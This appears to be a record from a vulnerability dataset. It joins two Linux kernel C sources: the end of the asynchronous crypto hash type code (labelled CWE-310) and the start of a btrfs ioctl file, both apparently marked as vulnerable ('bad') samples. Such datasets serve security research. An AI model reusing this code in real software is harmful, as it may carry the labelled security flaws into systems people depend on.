priv->result = req->result;
priv->complete = req->base.complete;
priv->data = req->base.data;
req->result = PTR_ALIGN((u8 *)priv->ubuf, alignmask + 1);
req->base.complete = ahash_def_finup_done1;
req->base.data = req;
req->priv = priv;
return ahash_def_finup_finish1(req, tfm->update(req));
}
static int ahash_no_export(struct ahash_request *req, void *out)
{
return -ENOSYS;
}
static int ahash_no_import(struct ahash_request *req, const void *in)
{
return -ENOSYS;
}
static int crypto_ahash_init_tfm(struct crypto_tfm *tfm)
{
struct crypto_ahash *hash = __crypto_ahash_cast(tfm);
struct ahash_alg *alg = crypto_ahash_alg(hash);
hash->setkey = ahash_nosetkey;
hash->export = ahash_no_export;
hash->import = ahash_no_import;
if (tfm->__crt_alg->cra_type != &crypto_ahash_type)
return crypto_init_shash_ops_async(tfm);
hash->init = alg->init;
hash->update = alg->update;
hash->final = alg->final;
hash->finup = alg->finup ?: ahash_def_finup;
hash->digest = alg->digest;
if (alg->setkey)
hash->setkey = alg->setkey;
if (alg->export)
hash->export = alg->export;
if (alg->import)
hash->import = alg->import;
return 0;
}
static unsigned int crypto_ahash_extsize(struct crypto_alg *alg)
{
if (alg->cra_type == &crypto_ahash_type)
return alg->cra_ctxsize;
return sizeof(struct crypto_shash *);
}
#ifdef CONFIG_NET
static int crypto_ahash_report(struct sk_buff *skb, struct crypto_alg *alg)
{
struct crypto_report_hash rhash;
snprintf(rhash.type, CRYPTO_MAX_ALG_NAME, "%s", "ahash");
rhash.blocksize = alg->cra_blocksize;
rhash.digestsize = __crypto_hash_alg_common(alg)->digestsize;
if (nla_put(skb, CRYPTOCFGA_REPORT_HASH,
sizeof(struct crypto_report_hash), &rhash))
goto nla_put_failure;
return 0;
nla_put_failure:
return -EMSGSIZE;
}
#else
static int crypto_ahash_report(struct sk_buff *skb, struct crypto_alg *alg)
{
return -ENOSYS;
}
#endif
static void crypto_ahash_show(struct seq_file *m, struct crypto_alg *alg)
__attribute__ ((unused));
static void crypto_ahash_show(struct seq_file *m, struct crypto_alg *alg)
{
seq_printf(m, "type : ahash\n");
seq_printf(m, "async : %s\n", alg->cra_flags & CRYPTO_ALG_ASYNC ?
"yes" : "no");
seq_printf(m, "blocksize : %u\n", alg->cra_blocksize);
seq_printf(m, "digestsize : %u\n",
__crypto_hash_alg_common(alg)->digestsize);
}
const struct crypto_type crypto_ahash_type = {
.extsize = crypto_ahash_extsize,
.init_tfm = crypto_ahash_init_tfm,
#ifdef CONFIG_PROC_FS
.show = crypto_ahash_show,
#endif
.report = crypto_ahash_report,
.maskclear = ~CRYPTO_ALG_TYPE_MASK,
.maskset = CRYPTO_ALG_TYPE_AHASH_MASK,
.type = CRYPTO_ALG_TYPE_AHASH,
.tfmsize = offsetof(struct crypto_ahash, base),
};
EXPORT_SYMBOL_GPL(crypto_ahash_type);
struct crypto_ahash *crypto_alloc_ahash(const char *alg_name, u32 type,
u32 mask)
{
return crypto_alloc_tfm(alg_name, &crypto_ahash_type, type, mask);
}
EXPORT_SYMBOL_GPL(crypto_alloc_ahash);
static int ahash_prepare_alg(struct ahash_alg *alg)
{
struct crypto_alg *base = &alg->halg.base;
if (alg->halg.digestsize > PAGE_SIZE / 8 ||
alg->halg.statesize > PAGE_SIZE / 8)
return -EINVAL;
base->cra_type = &crypto_ahash_type;
base->cra_flags &= ~CRYPTO_ALG_TYPE_MASK;
base->cra_flags |= CRYPTO_ALG_TYPE_AHASH;
return 0;
}
int crypto_register_ahash(struct ahash_alg *alg)
{
struct crypto_alg *base = &alg->halg.base;
int err;
err = ahash_prepare_alg(alg);
if (err)
return err;
return crypto_register_alg(base);
}
EXPORT_SYMBOL_GPL(crypto_register_ahash);
int crypto_unregister_ahash(struct ahash_alg *alg)
{
return crypto_unregister_alg(&alg->halg.base);
}
EXPORT_SYMBOL_GPL(crypto_unregister_ahash);
int ahash_register_instance(struct crypto_template *tmpl,
struct ahash_instance *inst)
{
int err;
err = ahash_prepare_alg(&inst->alg);
if (err)
return err;
return crypto_register_instance(tmpl, ahash_crypto_instance(inst));
}
EXPORT_SYMBOL_GPL(ahash_register_instance);
void ahash_free_instance(struct crypto_instance *inst)
{
crypto_drop_spawn(crypto_instance_ctx(inst));
kfree(ahash_instance(inst));
}
EXPORT_SYMBOL_GPL(ahash_free_instance);
int crypto_init_ahash_spawn(struct crypto_ahash_spawn *spawn,
struct hash_alg_common *alg,
struct crypto_instance *inst)
{
return crypto_init_spawn2(&spawn->base, &alg->base, inst,
&crypto_ahash_type);
}
EXPORT_SYMBOL_GPL(crypto_init_ahash_spawn);
struct hash_alg_common *ahash_attr_alg(struct rtattr *rta, u32 type, u32 mask)
{
struct crypto_alg *alg;
alg = crypto_attr_alg2(rta, &crypto_ahash_type, type, mask);
return IS_ERR(alg) ? ERR_CAST(alg) : __crypto_hash_alg_common(alg);
}
EXPORT_SYMBOL_GPL(ahash_attr_alg);
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Asynchronous cryptographic hash type");
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_5666_2 |
crossvul-cpp_data_bad_3783_3 | /*
* Copyright (C) 2007 Oracle. All rights reserved.
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public
* License v2 as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public
* License along with this program; if not, write to the
* Free Software Foundation, Inc., 59 Temple Place - Suite 330,
* Boston, MA 021110-1307, USA.
*/
#include <linux/kernel.h>
#include <linux/bio.h>
#include <linux/buffer_head.h>
#include <linux/file.h>
#include <linux/fs.h>
#include <linux/fsnotify.h>
#include <linux/pagemap.h>
#include <linux/highmem.h>
#include <linux/time.h>
#include <linux/init.h>
#include <linux/string.h>
#include <linux/backing-dev.h>
#include <linux/mount.h>
#include <linux/mpage.h>
#include <linux/namei.h>
#include <linux/swap.h>
#include <linux/writeback.h>
#include <linux/statfs.h>
#include <linux/compat.h>
#include <linux/bit_spinlock.h>
#include <linux/security.h>
#include <linux/xattr.h>
#include <linux/vmalloc.h>
#include <linux/slab.h>
#include <linux/blkdev.h>
#include <linux/uuid.h>
#include "compat.h"
#include "ctree.h"
#include "disk-io.h"
#include "transaction.h"
#include "btrfs_inode.h"
#include "ioctl.h"
#include "print-tree.h"
#include "volumes.h"
#include "locking.h"
#include "inode-map.h"
#include "backref.h"
#include "rcu-string.h"
#include "send.h"
#include "dev-replace.h"
/* Mask out flags that are inappropriate for the given type of inode. */
static inline __u32 btrfs_mask_flags(umode_t mode, __u32 flags)
{
if (S_ISDIR(mode))
return flags;
else if (S_ISREG(mode))
return flags & ~FS_DIRSYNC_FL;
else
return flags & (FS_NODUMP_FL | FS_NOATIME_FL);
}
/*
* Export inode flags to the format expected by the FS_IOC_GETFLAGS ioctl.
*/
static unsigned int btrfs_flags_to_ioctl(unsigned int flags)
{
unsigned int iflags = 0;
if (flags & BTRFS_INODE_SYNC)
iflags |= FS_SYNC_FL;
if (flags & BTRFS_INODE_IMMUTABLE)
iflags |= FS_IMMUTABLE_FL;
if (flags & BTRFS_INODE_APPEND)
iflags |= FS_APPEND_FL;
if (flags & BTRFS_INODE_NODUMP)
iflags |= FS_NODUMP_FL;
if (flags & BTRFS_INODE_NOATIME)
iflags |= FS_NOATIME_FL;
if (flags & BTRFS_INODE_DIRSYNC)
iflags |= FS_DIRSYNC_FL;
if (flags & BTRFS_INODE_NODATACOW)
iflags |= FS_NOCOW_FL;
if ((flags & BTRFS_INODE_COMPRESS) && !(flags & BTRFS_INODE_NOCOMPRESS))
iflags |= FS_COMPR_FL;
else if (flags & BTRFS_INODE_NOCOMPRESS)
iflags |= FS_NOCOMP_FL;
return iflags;
}
/*
* Update inode->i_flags based on the btrfs internal flags.
*/
void btrfs_update_iflags(struct inode *inode)
{
struct btrfs_inode *ip = BTRFS_I(inode);
inode->i_flags &= ~(S_SYNC|S_APPEND|S_IMMUTABLE|S_NOATIME|S_DIRSYNC);
if (ip->flags & BTRFS_INODE_SYNC)
inode->i_flags |= S_SYNC;
if (ip->flags & BTRFS_INODE_IMMUTABLE)
inode->i_flags |= S_IMMUTABLE;
if (ip->flags & BTRFS_INODE_APPEND)
inode->i_flags |= S_APPEND;
if (ip->flags & BTRFS_INODE_NOATIME)
inode->i_flags |= S_NOATIME;
if (ip->flags & BTRFS_INODE_DIRSYNC)
inode->i_flags |= S_DIRSYNC;
}
/*
* Inherit flags from the parent inode.
*
* Currently only the compression flags and the cow flags are inherited.
*/
void btrfs_inherit_iflags(struct inode *inode, struct inode *dir)
{
unsigned int flags;
if (!dir)
return;
flags = BTRFS_I(dir)->flags;
if (flags & BTRFS_INODE_NOCOMPRESS) {
BTRFS_I(inode)->flags &= ~BTRFS_INODE_COMPRESS;
BTRFS_I(inode)->flags |= BTRFS_INODE_NOCOMPRESS;
} else if (flags & BTRFS_INODE_COMPRESS) {
BTRFS_I(inode)->flags &= ~BTRFS_INODE_NOCOMPRESS;
BTRFS_I(inode)->flags |= BTRFS_INODE_COMPRESS;
}
if (flags & BTRFS_INODE_NODATACOW)
BTRFS_I(inode)->flags |= BTRFS_INODE_NODATACOW;
btrfs_update_iflags(inode);
}
static int btrfs_ioctl_getflags(struct file *file, void __user *arg)
{
struct btrfs_inode *ip = BTRFS_I(file->f_path.dentry->d_inode);
unsigned int flags = btrfs_flags_to_ioctl(ip->flags);
if (copy_to_user(arg, &flags, sizeof(flags)))
return -EFAULT;
return 0;
}
static int check_flags(unsigned int flags)
{
if (flags & ~(FS_IMMUTABLE_FL | FS_APPEND_FL | \
FS_NOATIME_FL | FS_NODUMP_FL | \
FS_SYNC_FL | FS_DIRSYNC_FL | \
FS_NOCOMP_FL | FS_COMPR_FL |
FS_NOCOW_FL))
return -EOPNOTSUPP;
if ((flags & FS_NOCOMP_FL) && (flags & FS_COMPR_FL))
return -EINVAL;
return 0;
}
static int btrfs_ioctl_setflags(struct file *file, void __user *arg)
{
struct inode *inode = file->f_path.dentry->d_inode;
struct btrfs_inode *ip = BTRFS_I(inode);
struct btrfs_root *root = ip->root;
struct btrfs_trans_handle *trans;
unsigned int flags, oldflags;
int ret;
u64 ip_oldflags;
unsigned int i_oldflags;
umode_t mode;
if (btrfs_root_readonly(root))
return -EROFS;
if (copy_from_user(&flags, arg, sizeof(flags)))
return -EFAULT;
ret = check_flags(flags);
if (ret)
return ret;
if (!inode_owner_or_capable(inode))
return -EACCES;
ret = mnt_want_write_file(file);
if (ret)
return ret;
mutex_lock(&inode->i_mutex);
ip_oldflags = ip->flags;
i_oldflags = inode->i_flags;
mode = inode->i_mode;
flags = btrfs_mask_flags(inode->i_mode, flags);
oldflags = btrfs_flags_to_ioctl(ip->flags);
if ((flags ^ oldflags) & (FS_APPEND_FL | FS_IMMUTABLE_FL)) {
if (!capable(CAP_LINUX_IMMUTABLE)) {
ret = -EPERM;
goto out_unlock;
}
}
if (flags & FS_SYNC_FL)
ip->flags |= BTRFS_INODE_SYNC;
else
ip->flags &= ~BTRFS_INODE_SYNC;
if (flags & FS_IMMUTABLE_FL)
ip->flags |= BTRFS_INODE_IMMUTABLE;
else
ip->flags &= ~BTRFS_INODE_IMMUTABLE;
if (flags & FS_APPEND_FL)
ip->flags |= BTRFS_INODE_APPEND;
else
ip->flags &= ~BTRFS_INODE_APPEND;
if (flags & FS_NODUMP_FL)
ip->flags |= BTRFS_INODE_NODUMP;
else
ip->flags &= ~BTRFS_INODE_NODUMP;
if (flags & FS_NOATIME_FL)
ip->flags |= BTRFS_INODE_NOATIME;
else
ip->flags &= ~BTRFS_INODE_NOATIME;
if (flags & FS_DIRSYNC_FL)
ip->flags |= BTRFS_INODE_DIRSYNC;
else
ip->flags &= ~BTRFS_INODE_DIRSYNC;
if (flags & FS_NOCOW_FL) {
if (S_ISREG(mode)) {
/*
* It's safe to turn csums off here, no extents exist.
* Otherwise we want the flag to reflect the real COW
* status of the file and will not set it.
*/
if (inode->i_size == 0)
ip->flags |= BTRFS_INODE_NODATACOW
| BTRFS_INODE_NODATASUM;
} else {
ip->flags |= BTRFS_INODE_NODATACOW;
}
} else {
/*
* Revert back under same assuptions as above
*/
if (S_ISREG(mode)) {
if (inode->i_size == 0)
ip->flags &= ~(BTRFS_INODE_NODATACOW
| BTRFS_INODE_NODATASUM);
} else {
ip->flags &= ~BTRFS_INODE_NODATACOW;
}
}
/*
* The COMPRESS flag can only be changed by users, while the NOCOMPRESS
* flag may be changed automatically if compression code won't make
* things smaller.
*/
if (flags & FS_NOCOMP_FL) {
ip->flags &= ~BTRFS_INODE_COMPRESS;
ip->flags |= BTRFS_INODE_NOCOMPRESS;
} else if (flags & FS_COMPR_FL) {
ip->flags |= BTRFS_INODE_COMPRESS;
ip->flags &= ~BTRFS_INODE_NOCOMPRESS;
} else {
ip->flags &= ~(BTRFS_INODE_COMPRESS | BTRFS_INODE_NOCOMPRESS);
}
trans = btrfs_start_transaction(root, 1);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto out_drop;
}
btrfs_update_iflags(inode);
inode_inc_iversion(inode);
inode->i_ctime = CURRENT_TIME;
ret = btrfs_update_inode(trans, root, inode);
btrfs_end_transaction(trans, root);
out_drop:
if (ret) {
ip->flags = ip_oldflags;
inode->i_flags = i_oldflags;
}
out_unlock:
mutex_unlock(&inode->i_mutex);
mnt_drop_write_file(file);
return ret;
}
static int btrfs_ioctl_getversion(struct file *file, int __user *arg)
{
struct inode *inode = file->f_path.dentry->d_inode;
return put_user(inode->i_generation, arg);
}
static noinline int btrfs_ioctl_fitrim(struct file *file, void __user *arg)
{
struct btrfs_fs_info *fs_info = btrfs_sb(fdentry(file)->d_sb);
struct btrfs_device *device;
struct request_queue *q;
struct fstrim_range range;
u64 minlen = ULLONG_MAX;
u64 num_devices = 0;
u64 total_bytes = btrfs_super_total_bytes(fs_info->super_copy);
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
rcu_read_lock();
list_for_each_entry_rcu(device, &fs_info->fs_devices->devices,
dev_list) {
if (!device->bdev)
continue;
q = bdev_get_queue(device->bdev);
if (blk_queue_discard(q)) {
num_devices++;
minlen = min((u64)q->limits.discard_granularity,
minlen);
}
}
rcu_read_unlock();
if (!num_devices)
return -EOPNOTSUPP;
if (copy_from_user(&range, arg, sizeof(range)))
return -EFAULT;
if (range.start > total_bytes ||
range.len < fs_info->sb->s_blocksize)
return -EINVAL;
range.len = min(range.len, total_bytes - range.start);
range.minlen = max(range.minlen, minlen);
ret = btrfs_trim_fs(fs_info->tree_root, &range);
if (ret < 0)
return ret;
if (copy_to_user(arg, &range, sizeof(range)))
return -EFAULT;
return 0;
}
static noinline int create_subvol(struct btrfs_root *root,
struct dentry *dentry,
char *name, int namelen,
u64 *async_transid,
struct btrfs_qgroup_inherit **inherit)
{
struct btrfs_trans_handle *trans;
struct btrfs_key key;
struct btrfs_root_item root_item;
struct btrfs_inode_item *inode_item;
struct extent_buffer *leaf;
struct btrfs_root *new_root;
struct dentry *parent = dentry->d_parent;
struct inode *dir;
struct timespec cur_time = CURRENT_TIME;
int ret;
int err;
u64 objectid;
u64 new_dirid = BTRFS_FIRST_FREE_OBJECTID;
u64 index = 0;
uuid_le new_uuid;
ret = btrfs_find_free_objectid(root->fs_info->tree_root, &objectid);
if (ret)
return ret;
dir = parent->d_inode;
/*
* 1 - inode item
* 2 - refs
* 1 - root item
* 2 - dir items
*/
trans = btrfs_start_transaction(root, 6);
if (IS_ERR(trans))
return PTR_ERR(trans);
ret = btrfs_qgroup_inherit(trans, root->fs_info, 0, objectid,
inherit ? *inherit : NULL);
if (ret)
goto fail;
leaf = btrfs_alloc_free_block(trans, root, root->leafsize,
0, objectid, NULL, 0, 0, 0);
if (IS_ERR(leaf)) {
ret = PTR_ERR(leaf);
goto fail;
}
memset_extent_buffer(leaf, 0, 0, sizeof(struct btrfs_header));
btrfs_set_header_bytenr(leaf, leaf->start);
btrfs_set_header_generation(leaf, trans->transid);
btrfs_set_header_backref_rev(leaf, BTRFS_MIXED_BACKREF_REV);
btrfs_set_header_owner(leaf, objectid);
write_extent_buffer(leaf, root->fs_info->fsid,
(unsigned long)btrfs_header_fsid(leaf),
BTRFS_FSID_SIZE);
write_extent_buffer(leaf, root->fs_info->chunk_tree_uuid,
(unsigned long)btrfs_header_chunk_tree_uuid(leaf),
BTRFS_UUID_SIZE);
btrfs_mark_buffer_dirty(leaf);
memset(&root_item, 0, sizeof(root_item));
inode_item = &root_item.inode;
inode_item->generation = cpu_to_le64(1);
inode_item->size = cpu_to_le64(3);
inode_item->nlink = cpu_to_le32(1);
inode_item->nbytes = cpu_to_le64(root->leafsize);
inode_item->mode = cpu_to_le32(S_IFDIR | 0755);
root_item.flags = 0;
root_item.byte_limit = 0;
inode_item->flags = cpu_to_le64(BTRFS_INODE_ROOT_ITEM_INIT);
btrfs_set_root_bytenr(&root_item, leaf->start);
btrfs_set_root_generation(&root_item, trans->transid);
btrfs_set_root_level(&root_item, 0);
btrfs_set_root_refs(&root_item, 1);
btrfs_set_root_used(&root_item, leaf->len);
btrfs_set_root_last_snapshot(&root_item, 0);
btrfs_set_root_generation_v2(&root_item,
btrfs_root_generation(&root_item));
uuid_le_gen(&new_uuid);
memcpy(root_item.uuid, new_uuid.b, BTRFS_UUID_SIZE);
root_item.otime.sec = cpu_to_le64(cur_time.tv_sec);
root_item.otime.nsec = cpu_to_le32(cur_time.tv_nsec);
root_item.ctime = root_item.otime;
btrfs_set_root_ctransid(&root_item, trans->transid);
btrfs_set_root_otransid(&root_item, trans->transid);
btrfs_tree_unlock(leaf);
free_extent_buffer(leaf);
leaf = NULL;
btrfs_set_root_dirid(&root_item, new_dirid);
key.objectid = objectid;
key.offset = 0;
btrfs_set_key_type(&key, BTRFS_ROOT_ITEM_KEY);
ret = btrfs_insert_root(trans, root->fs_info->tree_root, &key,
&root_item);
if (ret)
goto fail;
key.offset = (u64)-1;
new_root = btrfs_read_fs_root_no_name(root->fs_info, &key);
if (IS_ERR(new_root)) {
btrfs_abort_transaction(trans, root, PTR_ERR(new_root));
ret = PTR_ERR(new_root);
goto fail;
}
btrfs_record_root_in_trans(trans, new_root);
ret = btrfs_create_subvol_root(trans, new_root, new_dirid);
if (ret) {
/* We potentially lose an unused inode item here */
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
/*
* insert the directory item
*/
ret = btrfs_set_inode_index(dir, &index);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
ret = btrfs_insert_dir_item(trans, root,
name, namelen, dir, &key,
BTRFS_FT_DIR, index);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto fail;
}
btrfs_i_size_write(dir, dir->i_size + namelen * 2);
ret = btrfs_update_inode(trans, root, dir);
BUG_ON(ret);
ret = btrfs_add_root_ref(trans, root->fs_info->tree_root,
objectid, root->root_key.objectid,
btrfs_ino(dir), index, name, namelen);
BUG_ON(ret);
d_instantiate(dentry, btrfs_lookup_dentry(dir, dentry));
fail:
if (async_transid) {
*async_transid = trans->transid;
err = btrfs_commit_transaction_async(trans, root, 1);
} else {
err = btrfs_commit_transaction(trans, root);
}
if (err && !ret)
ret = err;
return ret;
}
static int create_snapshot(struct btrfs_root *root, struct dentry *dentry,
char *name, int namelen, u64 *async_transid,
bool readonly, struct btrfs_qgroup_inherit **inherit)
{
struct inode *inode;
struct btrfs_pending_snapshot *pending_snapshot;
struct btrfs_trans_handle *trans;
int ret;
if (!root->ref_cows)
return -EINVAL;
pending_snapshot = kzalloc(sizeof(*pending_snapshot), GFP_NOFS);
if (!pending_snapshot)
return -ENOMEM;
btrfs_init_block_rsv(&pending_snapshot->block_rsv,
BTRFS_BLOCK_RSV_TEMP);
pending_snapshot->dentry = dentry;
pending_snapshot->root = root;
pending_snapshot->readonly = readonly;
if (inherit) {
pending_snapshot->inherit = *inherit;
*inherit = NULL; /* take responsibility to free it */
}
trans = btrfs_start_transaction(root->fs_info->extent_root, 6);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto fail;
}
ret = btrfs_snap_reserve_metadata(trans, pending_snapshot);
BUG_ON(ret);
spin_lock(&root->fs_info->trans_lock);
list_add(&pending_snapshot->list,
&trans->transaction->pending_snapshots);
spin_unlock(&root->fs_info->trans_lock);
if (async_transid) {
*async_transid = trans->transid;
ret = btrfs_commit_transaction_async(trans,
root->fs_info->extent_root, 1);
} else {
ret = btrfs_commit_transaction(trans,
root->fs_info->extent_root);
}
if (ret) {
/* cleanup_transaction has freed this for us */
if (trans->aborted)
pending_snapshot = NULL;
goto fail;
}
ret = pending_snapshot->error;
if (ret)
goto fail;
ret = btrfs_orphan_cleanup(pending_snapshot->snap);
if (ret)
goto fail;
inode = btrfs_lookup_dentry(dentry->d_parent->d_inode, dentry);
if (IS_ERR(inode)) {
ret = PTR_ERR(inode);
goto fail;
}
BUG_ON(!inode);
d_instantiate(dentry, inode);
ret = 0;
fail:
kfree(pending_snapshot);
return ret;
}
/* copy of check_sticky in fs/namei.c()
* It's inline, so penalty for filesystems that don't use sticky bit is
* minimal.
*/
static inline int btrfs_check_sticky(struct inode *dir, struct inode *inode)
{
kuid_t fsuid = current_fsuid();
if (!(dir->i_mode & S_ISVTX))
return 0;
if (uid_eq(inode->i_uid, fsuid))
return 0;
if (uid_eq(dir->i_uid, fsuid))
return 0;
return !capable(CAP_FOWNER);
}
/* copy of may_delete in fs/namei.c()
* Check whether we can remove a link victim from directory dir, check
* whether the type of victim is right.
* 1. We can't do it if dir is read-only (done in permission())
* 2. We should have write and exec permissions on dir
* 3. We can't remove anything from append-only dir
* 4. We can't do anything with immutable dir (done in permission())
* 5. If the sticky bit on dir is set we should either
* a. be owner of dir, or
* b. be owner of victim, or
* c. have CAP_FOWNER capability
* 6. If the victim is append-only or immutable we can't do antyhing with
* links pointing to it.
* 7. If we were asked to remove a directory and victim isn't one - ENOTDIR.
* 8. If we were asked to remove a non-directory and victim isn't one - EISDIR.
* 9. We can't remove a root or mountpoint.
* 10. We don't allow removal of NFS sillyrenamed files; it's handled by
* nfs_async_unlink().
*/
static int btrfs_may_delete(struct inode *dir,struct dentry *victim,int isdir)
{
int error;
if (!victim->d_inode)
return -ENOENT;
BUG_ON(victim->d_parent->d_inode != dir);
audit_inode_child(dir, victim, AUDIT_TYPE_CHILD_DELETE);
error = inode_permission(dir, MAY_WRITE | MAY_EXEC);
if (error)
return error;
if (IS_APPEND(dir))
return -EPERM;
if (btrfs_check_sticky(dir, victim->d_inode)||
IS_APPEND(victim->d_inode)||
IS_IMMUTABLE(victim->d_inode) || IS_SWAPFILE(victim->d_inode))
return -EPERM;
if (isdir) {
if (!S_ISDIR(victim->d_inode->i_mode))
return -ENOTDIR;
if (IS_ROOT(victim))
return -EBUSY;
} else if (S_ISDIR(victim->d_inode->i_mode))
return -EISDIR;
if (IS_DEADDIR(dir))
return -ENOENT;
if (victim->d_flags & DCACHE_NFSFS_RENAMED)
return -EBUSY;
return 0;
}
/* copy of may_create in fs/namei.c() */
static inline int btrfs_may_create(struct inode *dir, struct dentry *child)
{
if (child->d_inode)
return -EEXIST;
if (IS_DEADDIR(dir))
return -ENOENT;
return inode_permission(dir, MAY_WRITE | MAY_EXEC);
}
/*
* Create a new subvolume below @parent. This is largely modeled after
* sys_mkdirat and vfs_mkdir, but we only do a single component lookup
* inside this filesystem so it's quite a bit simpler.
*/
static noinline int btrfs_mksubvol(struct path *parent,
char *name, int namelen,
struct btrfs_root *snap_src,
u64 *async_transid, bool readonly,
struct btrfs_qgroup_inherit **inherit)
{
struct inode *dir = parent->dentry->d_inode;
struct dentry *dentry;
int error;
mutex_lock_nested(&dir->i_mutex, I_MUTEX_PARENT);
dentry = lookup_one_len(name, parent->dentry, namelen);
error = PTR_ERR(dentry);
if (IS_ERR(dentry))
goto out_unlock;
error = -EEXIST;
if (dentry->d_inode)
goto out_dput;
error = btrfs_may_create(dir, dentry);
if (error)
goto out_dput;
down_read(&BTRFS_I(dir)->root->fs_info->subvol_sem);
if (btrfs_root_refs(&BTRFS_I(dir)->root->root_item) == 0)
goto out_up_read;
if (snap_src) {
error = create_snapshot(snap_src, dentry, name, namelen,
async_transid, readonly, inherit);
} else {
error = create_subvol(BTRFS_I(dir)->root, dentry,
name, namelen, async_transid, inherit);
}
if (!error)
fsnotify_mkdir(dir, dentry);
out_up_read:
up_read(&BTRFS_I(dir)->root->fs_info->subvol_sem);
out_dput:
dput(dentry);
out_unlock:
mutex_unlock(&dir->i_mutex);
return error;
}
/*
* When we're defragging a range, we don't want to kick it off again
* if it is really just waiting for delalloc to send it down.
* If we find a nice big extent or delalloc range for the bytes in the
* file you want to defrag, we return 0 to let you know to skip this
* part of the file
*/
static int check_defrag_in_cache(struct inode *inode, u64 offset, int thresh)
{
struct extent_io_tree *io_tree = &BTRFS_I(inode)->io_tree;
struct extent_map *em = NULL;
struct extent_map_tree *em_tree = &BTRFS_I(inode)->extent_tree;
u64 end;
read_lock(&em_tree->lock);
em = lookup_extent_mapping(em_tree, offset, PAGE_CACHE_SIZE);
read_unlock(&em_tree->lock);
if (em) {
end = extent_map_end(em);
free_extent_map(em);
if (end - offset > thresh)
return 0;
}
/* if we already have a nice delalloc here, just stop */
thresh /= 2;
end = count_range_bits(io_tree, &offset, offset + thresh,
thresh, EXTENT_DELALLOC, 1);
if (end >= thresh)
return 0;
return 1;
}
/*
* helper function to walk through a file and find extents
* newer than a specific transid, and smaller than thresh.
*
* This is used by the defragging code to find new and small
* extents
*/
static int find_new_extents(struct btrfs_root *root,
struct inode *inode, u64 newer_than,
u64 *off, int thresh)
{
struct btrfs_path *path;
struct btrfs_key min_key;
struct btrfs_key max_key;
struct extent_buffer *leaf;
struct btrfs_file_extent_item *extent;
int type;
int ret;
u64 ino = btrfs_ino(inode);
path = btrfs_alloc_path();
if (!path)
return -ENOMEM;
min_key.objectid = ino;
min_key.type = BTRFS_EXTENT_DATA_KEY;
min_key.offset = *off;
max_key.objectid = ino;
max_key.type = (u8)-1;
max_key.offset = (u64)-1;
path->keep_locks = 1;
while(1) {
ret = btrfs_search_forward(root, &min_key, &max_key,
path, 0, newer_than);
if (ret != 0)
goto none;
if (min_key.objectid != ino)
goto none;
if (min_key.type != BTRFS_EXTENT_DATA_KEY)
goto none;
leaf = path->nodes[0];
extent = btrfs_item_ptr(leaf, path->slots[0],
struct btrfs_file_extent_item);
type = btrfs_file_extent_type(leaf, extent);
if (type == BTRFS_FILE_EXTENT_REG &&
btrfs_file_extent_num_bytes(leaf, extent) < thresh &&
check_defrag_in_cache(inode, min_key.offset, thresh)) {
*off = min_key.offset;
btrfs_free_path(path);
return 0;
}
if (min_key.offset == (u64)-1)
goto none;
min_key.offset++;
btrfs_release_path(path);
}
none:
btrfs_free_path(path);
return -ENOENT;
}
static struct extent_map *defrag_lookup_extent(struct inode *inode, u64 start)
{
struct extent_map_tree *em_tree = &BTRFS_I(inode)->extent_tree;
struct extent_io_tree *io_tree = &BTRFS_I(inode)->io_tree;
struct extent_map *em;
u64 len = PAGE_CACHE_SIZE;
/*
* hopefully we have this extent in the tree already, try without
* the full extent lock
*/
read_lock(&em_tree->lock);
em = lookup_extent_mapping(em_tree, start, len);
read_unlock(&em_tree->lock);
if (!em) {
/* get the big lock and read metadata off disk */
lock_extent(io_tree, start, start + len - 1);
em = btrfs_get_extent(inode, NULL, 0, start, len, 0);
unlock_extent(io_tree, start, start + len - 1);
if (IS_ERR(em))
return NULL;
}
return em;
}
static bool defrag_check_next_extent(struct inode *inode, struct extent_map *em)
{
struct extent_map *next;
bool ret = true;
/* this is the last extent */
if (em->start + em->len >= i_size_read(inode))
return false;
next = defrag_lookup_extent(inode, em->start + em->len);
if (!next || next->block_start >= EXTENT_MAP_LAST_BYTE)
ret = false;
free_extent_map(next);
return ret;
}
static int should_defrag_range(struct inode *inode, u64 start, int thresh,
u64 *last_len, u64 *skip, u64 *defrag_end,
int compress)
{
struct extent_map *em;
int ret = 1;
bool next_mergeable = true;
/*
* make sure that once we start defragging an extent, we keep on
* defragging it
*/
if (start < *defrag_end)
return 1;
*skip = 0;
em = defrag_lookup_extent(inode, start);
if (!em)
return 0;
/* this will cover holes, and inline extents */
if (em->block_start >= EXTENT_MAP_LAST_BYTE) {
ret = 0;
goto out;
}
next_mergeable = defrag_check_next_extent(inode, em);
/*
* we hit a real extent, if it is big or the next extent is not a
* real extent, don't bother defragging it
*/
if (!compress && (*last_len == 0 || *last_len >= thresh) &&
(em->len >= thresh || !next_mergeable))
ret = 0;
out:
/*
* last_len ends up being a counter of how many bytes we've defragged.
* every time we choose not to defrag an extent, we reset *last_len
* so that the next tiny extent will force a defrag.
*
* The end result of this is that tiny extents before a single big
* extent will force at least part of that big extent to be defragged.
*/
if (ret) {
*defrag_end = extent_map_end(em);
} else {
*last_len = 0;
*skip = extent_map_end(em);
*defrag_end = 0;
}
free_extent_map(em);
return ret;
}
/*
* it doesn't do much good to defrag one or two pages
* at a time. This pulls in a nice chunk of pages
* to COW and defrag.
*
* It also makes sure the delalloc code has enough
* dirty data to avoid making new small extents as part
* of the defrag
*
* It's a good idea to start RA on this range
* before calling this.
*/
static int cluster_pages_for_defrag(struct inode *inode,
struct page **pages,
unsigned long start_index,
int num_pages)
{
unsigned long file_end;
u64 isize = i_size_read(inode);
u64 page_start;
u64 page_end;
u64 page_cnt;
int ret;
int i;
int i_done;
struct btrfs_ordered_extent *ordered;
struct extent_state *cached_state = NULL;
struct extent_io_tree *tree;
gfp_t mask = btrfs_alloc_write_mask(inode->i_mapping);
file_end = (isize - 1) >> PAGE_CACHE_SHIFT;
